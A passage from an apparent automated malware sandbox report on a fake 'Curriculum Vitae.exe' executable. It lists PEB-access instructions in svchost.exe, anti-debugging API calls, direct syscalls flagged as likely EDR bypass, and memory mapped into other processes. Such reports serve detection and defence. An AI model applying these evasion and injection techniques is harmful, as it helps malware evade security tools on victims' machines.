            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]2_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]2_2_030D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]2_2_030DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]2_2_0302CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]2_2_030DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]2_2_0305EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]2_2_030BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]2_2_030BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]2_2_0306CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]2_2_0305EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]2_2_0306CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]2_2_030DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]2_2_03104A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]2_2_03068A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]2_2_03086AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]2_2_03030AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]2_2_030BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]2_2_030B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]2_2_030C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]2_2_030B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]2_2_030BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]2_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]2_2_030C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]2_2_030649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]2_2_030FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]2_2_030BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]2_2_030BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]2_2_0306A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]2_2_03042840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060854 mov eax, dword ptr fs:[00000030h]2_2_03060854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034859 mov eax, dword ptr fs:[00000030h]2_2_03034859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034859 mov eax, dword ptr fs:[00000030h]2_2_03034859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h]2_2_030BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h]2_2_030BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h]2_2_030C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h]2_2_030C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030887 mov eax, dword ptr fs:[00000030h]2_2_03030887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC89D mov eax, dword ptr fs:[00000030h]2_2_030BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E8C0 mov eax, dword ptr fs:[00000030h]2_2_0305E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA8E4 mov eax, dword ptr fs:[00000030h]2_2_030FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h]2_2_0306C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h]2_2_0306C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E6F00 mov eax, dword ptr fs:[00000030h]2_2_030E6F00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032F12 mov eax, dword ptr fs:[00000030h]2_2_03032F12
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CF1F mov eax, dword ptr fs:[00000030h]2_2_0306CF1F
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D90B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00D90B62
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D62622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D62622
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D5083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D5083F
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D509D5 SetUnhandledExceptionFilter,0_2_00D509D5
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D50C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D50C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtUnmapViewOfSection: Direct from: 0x76EF2D3CJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe protection: execute and read and writeJump to behavior
